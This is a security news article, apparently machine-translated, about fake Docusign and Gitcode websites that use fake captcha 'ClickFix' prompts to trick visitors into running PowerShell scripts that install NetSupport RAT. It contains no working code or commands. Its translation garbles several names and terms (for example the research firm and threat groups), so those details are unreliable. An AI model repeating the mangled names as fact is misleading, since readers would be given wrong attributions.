- Threat actors are creating false websites of Docusign and Gitcode
- The sites come with false captcha and other scam mechanisms
- The victims are cheated to download a Trojan
Security researchers have found False Gitcode and Docusign websites that distribute remote access Trojan malware (rat) using the infamous clickfix method.
Domaoindorols Research experts (DTI) found “Malicious multi -stage download scripts Powershell Scripts” housed on counterfeit websites that invite visitors to take out the Windows Run terminal and execute a script copied on its clipboard.
“In doing so, the Powershell script discharges another download script and is executed in the system, which in turn recovers additional useful loads and executes them eventually installing Netsupport Rat on infected machines,” the investigators said in their report. These multiple stages and downloads are designed to evade detection and help the campaign “be more resistant to security research and demolition.”
Socgholish
They also said they don’t know exactly how victims end on these websites. However, it is safe to assume that social engineering, spam email and possibly evil are part of the methodology. In some cases, false websites also come with a fake captcha verification mechanism that, to resolve, requires that victims copy and paste a code in the execute program, effectively downloading the malware.
TDI could not confirm the identity of the attackers, but it was emphasized that he had observed a similar campaign at the end of 2024, which was attributed to Socgholish:
“In particular, the techniques involved are Commonplace and Netsupport Manager is a legitimate administration tool that is known to be leveraged as a rat by multiple groups of threats such as End7, Scarlet Goldfinch, Storm-0408 and others,” the report concluded.
Socgholish, also known as fakeupdates, is known for its false browser and false software update alerts. After compromising a website, the Crooks would inject an emerging window, notifying visitors that their browser or operating system needs to “fix” or “update”.
This is the original clickfix method, one that turned from the old emerging window of “you have a virus” that imitated popular antivirus programs and delivered viruses.
Through The hacker news
